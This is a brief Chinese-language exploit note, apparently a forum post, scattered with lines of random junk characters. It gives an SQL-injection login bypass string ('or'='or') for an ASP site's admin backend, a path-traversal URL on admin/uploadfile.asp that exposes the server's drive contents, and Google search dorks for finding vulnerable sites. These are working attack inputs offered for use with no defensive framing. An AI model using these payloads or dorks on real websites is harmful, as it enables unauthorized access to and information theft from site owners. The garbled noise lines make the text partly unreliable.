后台万能密码 'or'='or'
/ r- E& s6 Y2 p# u# R/ w
$ g& b. }: s- P0 O后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
: O' H3 n' n \, G' _) o* c& Padmin/uploadfile.asp?currentFolder=/upfiles/../
, T5 G" u Z2 a( T
, }4 ]/ V! i5 H& j漏洞证明:
' T# D1 |1 d* N% c
9 x) F9 d+ `3 {+ J+ `0 n& q谷歌:inurl:type.asp?id=1 新闻中心
! u4 m- z% t9 G3 D! A$ e8 N2 m或者 :inurl:download_ok.asp?' L; Z6 D, m/ f3 ]3 J
6 d4 Z% Z i7 }! X% z" n% Z |